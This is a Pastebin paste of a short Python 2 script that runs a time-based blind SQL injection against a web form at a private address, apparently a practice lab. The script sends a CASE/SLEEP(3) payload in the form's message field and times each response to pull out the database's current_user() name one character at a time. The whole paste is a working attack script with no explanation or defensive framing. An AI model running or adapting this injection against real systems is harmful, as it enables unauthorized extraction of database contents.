Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- import timeit, string, urllib, sys
- max = 50
- l = list(string.printable)
- for i in range(max):
- found = False
- for c in l:
- t = timeit.Timer("requests.post(u, data=d)", "import requests; u=\"http://192.168.2.11/sqli/sql6/submit.php\"; d=\"name=name&email=name%40example.com&message='%2b(select+case+when+"+str(i+1)+"<=length((current_user()))+then+(select+case+when+substr(current_user(),"+str(i+1)+",1)='"+urllib.quote_plus(c)+"'+then+sleep(3)+else+0+end)+else+0+end)%2b'&submit=Submit\"")
- if t.timeit(number=1)>3.0:
- sys.stdout.write(c)
- found = True
- break
- if not found:
- break
- print ''
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement